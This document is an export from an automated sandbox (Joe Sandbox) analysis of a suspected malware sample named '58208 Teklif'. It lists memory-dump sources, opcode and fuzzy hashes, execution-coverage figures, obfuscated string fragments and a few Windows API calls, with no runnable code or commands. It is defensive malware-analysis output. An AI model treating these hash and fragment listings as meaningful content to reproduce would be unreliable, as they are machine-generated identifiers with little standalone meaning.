                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 75b2a41ec2abb536db39d928d1699425edcf289171e7270b2d253e7180165a04
                                                      • Instruction ID: 2351dd6659a90e227f7308aebedb3bfc94d934d6608725aa9d30a70c1c1e63e5
                                                      • Opcode Fuzzy Hash: 75b2a41ec2abb536db39d928d1699425edcf289171e7270b2d253e7180165a04
                                                      • Instruction Fuzzy Hash: D4D1CEB07026028FDB29DB79D460B6AB7F6AFC9740F14897ED545CB2A0DB35E801CB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bf621c91b4794d8bfcf7472625045a514303a32f919e1bda14264e6b7e402c2d
                                                      • Instruction ID: 35adb1b85d80b480677643e766c69d595da9a072fb6cfb81c379bb3fe4ee6118
                                                      • Opcode Fuzzy Hash: bf621c91b4794d8bfcf7472625045a514303a32f919e1bda14264e6b7e402c2d
                                                      • Instruction Fuzzy Hash: ADE14CB4E011199FCB14DFA9D5909AEFBB2FF88304F248169D815AB356D730AD81CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: be4e8a46fdae131227c0b069597c4ff19b9b236e44eecc2762cf08883909b627
                                                      • Instruction ID: ddf82347d1716aa7db501f1ce521a25fe3415c365f458b20b778c7420c40357c
                                                      • Opcode Fuzzy Hash: be4e8a46fdae131227c0b069597c4ff19b9b236e44eecc2762cf08883909b627
                                                      • Instruction Fuzzy Hash: 68E107B4E011598FCB14CFA9D5909AEFBB2FF89304F248169E815AB356D734AD41CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 60665ec9c12befbdfbded8cbf399259b568d21edac8a33c7117e69f7fd9a1326
                                                      • Instruction ID: 69ca3a4ba88582d784cdb519a97c8d03d6886340f39952fc878fe2ddfac93c98
                                                      • Opcode Fuzzy Hash: 60665ec9c12befbdfbded8cbf399259b568d21edac8a33c7117e69f7fd9a1326
                                                      • Instruction Fuzzy Hash: 08E13BB4E011598FCB14CFA9C5909AEFBB2FF89304F248169D815AB356D734AD42CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 66363be7b5e102e6bd273c2cce798a50620a537510ad80e7fca0ef5703411ff9
                                                      • Instruction ID: c91d66183ca47011c070d487dbac65f0327217193b45e176ea11359ce930a164
                                                      • Opcode Fuzzy Hash: 66363be7b5e102e6bd273c2cce798a50620a537510ad80e7fca0ef5703411ff9
                                                      • Instruction Fuzzy Hash: B6E119B4E012598FCB14CFA9D5909AEFBB2FF89304F248169D815AB356C734AD41CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1318711187.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1550000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4e266ca72f48bb39b79d660ea9a26fb7b7624a257a8ad5531d97c813bb17c6b9
                                                      • Instruction ID: 0f993b28d2d8e8de1a98f6369263f2cd9bb54e39dcdb5f9af46b80c5356c4ae2
                                                      • Opcode Fuzzy Hash: 4e266ca72f48bb39b79d660ea9a26fb7b7624a257a8ad5531d97c813bb17c6b9
                                                      • Instruction Fuzzy Hash: 5EA16D32A0020A8FCF55DFB4C89459EBBB2FF98300B15856BE905AF265DB31E945DB80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b03f275360b1094d2c38cacbbe709619b1278deaa958c43250452f3070c19a40
                                                      • Instruction ID: d9e08a988b52886d9347635772aab31b74d5290ad0e5aea7534aa3529835a55d
                                                      • Opcode Fuzzy Hash: b03f275360b1094d2c38cacbbe709619b1278deaa958c43250452f3070c19a40
                                                      • Instruction Fuzzy Hash: 8D5159B5E012199FCB14DFA9D9905AEFBB2FF89304F24C169D418AB356C7349942CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f4f3a898b01c19516e0c6a1763e0a0c4fb0fb20bf506087c43493f3bb8464670
                                                      • Instruction ID: 4b5b1c01f6fa7b5cbab34993b6ca09c6ccf45f187a52163d95d451a32a1e4a85
                                                      • Opcode Fuzzy Hash: f4f3a898b01c19516e0c6a1763e0a0c4fb0fb20bf506087c43493f3bb8464670
                                                      • Instruction Fuzzy Hash: 765109B4E012198FDB14CFA9D5905AEBBF2FF89304F24816AD418AB356D7349942CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:10.2%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:3.5%
                                                      Total number of Nodes:170
                                                      Total number of Limit Nodes:12

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (o_q$(o_q$,cq$,cq
                                                      • API String ID: 0-196421762
                                                      • Opcode ID: 59950719d9273bd0a9a221942b5eb15929d57fca7155a82c784d950f85ea3a8a
                                                      • Instruction ID: 861731714c6ce9ca78b5820df0bc2674a1c618400349f4e8196fb492ea7b1ffb
                                                      • Opcode Fuzzy Hash: 59950719d9273bd0a9a221942b5eb15929d57fca7155a82c784d950f85ea3a8a
                                                      • Instruction Fuzzy Hash: E7D11B70E001199FDB14CF99C984AAEBBB6FF88344F56846AE505AB379E770E841CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (o_q$Hcq
                                                      • API String ID: 0-689770731
                                                      • Opcode ID: a524a5a3654dcec8b2cd9920fca0d32f20622b84bccf1acd97f2926677facc88
                                                      • Instruction ID: aba26fee9618a56932846acdb3f9f21ac8358b87d4dd094982c5719082228ce8
                                                      • Opcode Fuzzy Hash: a524a5a3654dcec8b2cd9920fca0d32f20622b84bccf1acd97f2926677facc88
                                                      • Instruction Fuzzy Hash: D0129F70A002199FDB14DF69D854BAEBBF6BF88300F15856DE4059B3A9EB74EC41CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PH_q$PH_q
                                                      • API String ID: 0-3760492949
                                                      • Opcode ID: 5630b1b962688176bbc2eb1083b9cb507144dcac958add8e7a8fd85af76df830
                                                      • Instruction ID: 8c434c2e36334eaa64f30767d38a7036d6dd019c5ae5caed3a3c6f4dcbc2d090
                                                      • Opcode Fuzzy Hash: 5630b1b962688176bbc2eb1083b9cb507144dcac958add8e7a8fd85af76df830
                                                      • Instruction Fuzzy Hash: DFE10975E00218DFDB14DFA9C984A9EBBB2FF48310F15C46AE919AB365DB30A841CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PH_q$PH_q
                                                      • API String ID: 0-3760492949
                                                      • Opcode ID: 455982df8f219c3ce29771fea591249e707e35b3f015032c558b380308ad5599
                                                      • Instruction ID: b1a2e42f7e5dfd47305e4f92df521dbf81e7eefe42318f91ed90245c7a80087e
                                                      • Opcode Fuzzy Hash: 455982df8f219c3ce29771fea591249e707e35b3f015032c558b380308ad5599
                                                      • Instruction Fuzzy Hash: 7481E274E00218CFDB68DFA9D994BADBBF2BF89304F209169D419AB354EB345946CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PH_q$PH_q
                                                      • API String ID: 0-3760492949
                                                      • Opcode ID: 5a54897b4e98c96851f292aa5292ab2b2c482b2de6b25bc6e60a7def98b0d3bf
                                                      • Instruction ID: 93d4c0d26b1d3294b13ef2333e6055eb0d0f21b5f28c3281d54877d05c0bbcd9
                                                      • Opcode Fuzzy Hash: 5a54897b4e98c96851f292aa5292ab2b2c482b2de6b25bc6e60a7def98b0d3bf
                                                      • Instruction Fuzzy Hash: 8B81D674E40218CFDB14DFAAD984A9DBBF2BF89310F14C06AE419AB369DB315981CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PH_q$PH_q
                                                      • API String ID: 0-3760492949
                                                      • Opcode ID: e9993b2817a23742d1c4f4e3f3ddb20aeaaefe83a10e1335317cbcc97b9e597d
                                                      • Instruction ID: 0b264a7ae96e1dcb1df71437ce9db54f1d892a8fb5476c089c695d3d2468bcc3
                                                      • Opcode Fuzzy Hash: e9993b2817a23742d1c4f4e3f3ddb20aeaaefe83a10e1335317cbcc97b9e597d
                                                      • Instruction Fuzzy Hash: 5081C574E40218DFDB18DFAAD984A9DBBF2BF89310F14C06AE419AB369DB305841CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PH_q$PH_q
                                                      • API String ID: 0-3760492949
                                                      • Opcode ID: e91e5402be19df7d912c79b71bf40af0a4443f4473aec2603630dbe8f2fc6077
                                                      • Instruction ID: 4486005b6c79bb8ec4917458add96f85eeb1671bb5cf1d205cf8e1dd52245541
                                                      • Opcode Fuzzy Hash: e91e5402be19df7d912c79b71bf40af0a4443f4473aec2603630dbe8f2fc6077
                                                      • Instruction Fuzzy Hash: 6681D774E40218CFDB18DFAAD884A9DBBF2BF89300F14C06AE419AB369DB705945CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PH_q$PH_q
                                                      • API String ID: 0-3760492949
                                                      • Opcode ID: d7e676530cd5b9eaf9af93df10d12589d775754c58055a85470e81371dd14253
                                                      • Instruction ID: 9ed37c192712d70fbcc9c5725afd9b098cac94c8886109bb6a8a73bc32c57f7c
                                                      • Opcode Fuzzy Hash: d7e676530cd5b9eaf9af93df10d12589d775754c58055a85470e81371dd14253
                                                      • Instruction Fuzzy Hash: 2081C574E40218CFDB18DFAAD984A9DBBF2BF89310F14D06AE419AB369DB305941CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PH_q$PH_q
                                                      • API String ID: 0-3760492949
                                                      • Opcode ID: 4263b27211733c35cb6d46fb91d22f8b73723c351949c1aaa2191502bb899dd3
                                                      • Instruction ID: 92499ea7450a5304ef7d6c33c0d661415195db694f5ebcf801071dd434544d99
                                                      • Opcode Fuzzy Hash: 4263b27211733c35cb6d46fb91d22f8b73723c351949c1aaa2191502bb899dd3
                                                      • Instruction Fuzzy Hash: EE81B974E00218DFDB18DFAAD944A9DBBF2BF89310F15C06AE419AB369DB345981CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PH_q$PH_q
                                                      • API String ID: 0-3760492949
                                                      • Opcode ID: 9bdcba6d6d532784508d4e2113623fde78d99e6a633ccd450b50d8bdca4f02ad
                                                      • Instruction ID: f6a240581a138acae5f20644d65ec47a8022f82705cd2938105ef912391022d6
                                                      • Opcode Fuzzy Hash: 9bdcba6d6d532784508d4e2113623fde78d99e6a633ccd450b50d8bdca4f02ad
                                                      • Instruction Fuzzy Hash: F381C874E41218DFDB18DFAAD994A9DBBF2BF88310F14C06AE419AB369DB305941CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PH_q$PH_q
                                                      • API String ID: 0-3760492949
                                                      • Opcode ID: 39eb1023962acce210782f65680f91ef42581fb41665740a5b11fcb1bde8b841
                                                      • Instruction ID: 5e2e7af890290eb183681de5cb4a4a63b38c4aaee51d3800a881898fbd0a55e9
                                                      • Opcode Fuzzy Hash: 39eb1023962acce210782f65680f91ef42581fb41665740a5b11fcb1bde8b841
                                                      • Instruction Fuzzy Hash: 1681B674E00218CFDB18DFAAD994A9DBBF2FF88310F14806AE519AB365DB305945CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PH_q$PH_q
                                                      • API String ID: 0-3760492949
                                                      • Opcode ID: 203f0135611603ce9299ceac8d59d5d1adcd7fdd04a19686124872ce6c968572
                                                      • Instruction ID: 5c15329f379743dab4079806fb9587fcfb17ddd201e52edbfa3a75181877e44a
                                                      • Opcode Fuzzy Hash: 203f0135611603ce9299ceac8d59d5d1adcd7fdd04a19686124872ce6c968572
                                                      • Instruction Fuzzy Hash: 5361C874E002489FDB18DFAAD944A9EBBF2FF88300F14C46AE518AB369DB305945CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4ffee7eb0a8583207fb60c1e2a43ee196ab406eb3a5efd652835210fc41bea5a
                                                      • Instruction ID: 2ef136843f6869a87e773fd81d11d0c5a024de7fa7844a12df2a534938e0c9d9
                                                      • Opcode Fuzzy Hash: 4ffee7eb0a8583207fb60c1e2a43ee196ab406eb3a5efd652835210fc41bea5a
                                                      • Instruction Fuzzy Hash: B1F1F474E01229DFDB18DFA9C894B9DBBF2BF89304F1481A9E408AB355DB349985CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dd1fca46e46cd23568b004e35af04d14b9f4a3db29314fec6320a9c1cd23f6ac
                                                      • Instruction ID: e66358f25452d575815fc088717eca3dff86df3e28496bd98e1d5b4dd3cee7c1
                                                      • Opcode Fuzzy Hash: dd1fca46e46cd23568b004e35af04d14b9f4a3db29314fec6320a9c1cd23f6ac
                                                      • Instruction Fuzzy Hash: 28827F74E412299FDB64DF69C998BDDBBB2BF49300F1081E9A40DAB264DB315E85CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 52f267d6a7a087c0f72c64bbe1781abb8b0bdf989f66d5a8cf488f151731b999
                                                      • Instruction ID: 9771672f5e46083db27f0a4dc4f5c4c5c542610180161acc4eb6af040a03aba5
                                                      • Opcode Fuzzy Hash: 52f267d6a7a087c0f72c64bbe1781abb8b0bdf989f66d5a8cf488f151731b999
                                                      • Instruction Fuzzy Hash: 82E1D4B4E01218CFEB54DFA5D954B9DBBB2BF89300F1081AAD408AB394DB355E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dae89071158432b0bc5b1ac80a499634a5a7d2f35623573e16390c5f4a146b72
                                                      • Instruction ID: 4e324d6e1e613a99d85e590cb1295b9f0cf8ef05152b673469815c19ff6dae96
                                                      • Opcode Fuzzy Hash: dae89071158432b0bc5b1ac80a499634a5a7d2f35623573e16390c5f4a146b72
                                                      • Instruction Fuzzy Hash: 61A194B5E012188FEB54CF6AD944B9DBBF2AF89300F14D0AAD449AB254DB705A85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 893540e2a2738c0cf6b0d794b2ad26f3a7027b3997aca0ff58d0f6e77d6e9b84
                                                      • Instruction ID: a7ab6687c3221a34c734555fa47630873f0267a2a9fae166d59bb437fd64ecd2
                                                      • Opcode Fuzzy Hash: 893540e2a2738c0cf6b0d794b2ad26f3a7027b3997aca0ff58d0f6e77d6e9b84
                                                      • Instruction Fuzzy Hash: 8CA1A4B4E012188FEB68CF6AD944B9DBBF2BF89300F14D0AAD40DA7254DB305A85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 94efc0637141ed420bcc3179e356e3577fa8b98b1e74753c21c98b28c163210f
                                                      • Instruction ID: 37ab6c931a1946e9ac930086f268353e4b6a6332940db830d5f2ed9be96fbdfc
                                                      • Opcode Fuzzy Hash: 94efc0637141ed420bcc3179e356e3577fa8b98b1e74753c21c98b28c163210f
                                                      • Instruction Fuzzy Hash: C9A1B4B4E012188FEB64CF6AC944B9DBBF2AF89300F14D1AAD40DA7254EB345A85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8bb2e952b9bd13d3a27248e360d370452ccd20d76ac4f4e8985f5b0e237c08f1
                                                      • Instruction ID: 751786916ac9d8321ee72ba995a8e599994c1865a53c282f312270ad3c838b10
                                                      • Opcode Fuzzy Hash: 8bb2e952b9bd13d3a27248e360d370452ccd20d76ac4f4e8985f5b0e237c08f1
                                                      • Instruction Fuzzy Hash: 6DA195B4E012288FEB64CF6AD944B9DBBF2BF89300F14D0EAD409A7254DB305A85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fd6621e518408009064981fbf9580474d095e69c673fbcb38d48b13fb6bc387c
                                                      • Instruction ID: bbe83bec2e9b35677b6cb4baadcbf2ab2ef8051a67892fa3f732f41a47a605de
                                                      • Opcode Fuzzy Hash: fd6621e518408009064981fbf9580474d095e69c673fbcb38d48b13fb6bc387c
                                                      • Instruction Fuzzy Hash: 64A1A4B5E012188FEB58CF6AC944B9DFBF2AF89300F14D1AAD40DA7254EB345A85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5af545482926af7ad906988017eab9b5edfaea5a5e91a9fbafdba9dce87185c2
                                                      • Instruction ID: 850b5218bf4728f0c983c274ae74afeae0ed8e4baa931e82a3790a90f09cad41
                                                      • Opcode Fuzzy Hash: 5af545482926af7ad906988017eab9b5edfaea5a5e91a9fbafdba9dce87185c2
                                                      • Instruction Fuzzy Hash: 28A1A4B4E012188FEB64CF6AD944B9DBBF2BF89300F14D1AAD40DA7254EB705A85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: be7940086d448a573d31a5f7119576265bba2782c0bc07bcc19f23a5cda5a19d
                                                      • Instruction ID: 623d83cb1172d25d89dfe87f6ff85c4c3e61726e7954b8db2a5c20dcfe7cf253
                                                      • Opcode Fuzzy Hash: be7940086d448a573d31a5f7119576265bba2782c0bc07bcc19f23a5cda5a19d
                                                      • Instruction Fuzzy Hash: 1AA1A5B5E012188FEB64DF6AC944B9DFBF2AF89300F14D1AAD40DA7254DB345A85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (o_q$(o_q$(o_q$(o_q$(o_q$(o_q$,cq$,cq
                                                      • API String ID: 0-3630396145
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 06BF4BE6
                                                      • GetCurrentThread.KERNEL32 ref: 06BF4C23
                                                      • GetCurrentProcess.KERNEL32 ref: 06BF4C60
                                                      • GetCurrentThreadId.KERNEL32 ref: 06BF4CB9
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790247236.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bf0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 06BF4BE6
                                                      • GetCurrentThread.KERNEL32 ref: 06BF4C23
                                                      • GetCurrentProcess.KERNEL32 ref: 06BF4C60
                                                      • GetCurrentThreadId.KERNEL32 ref: 06BF4CB9
                                                      Memory Dump Source
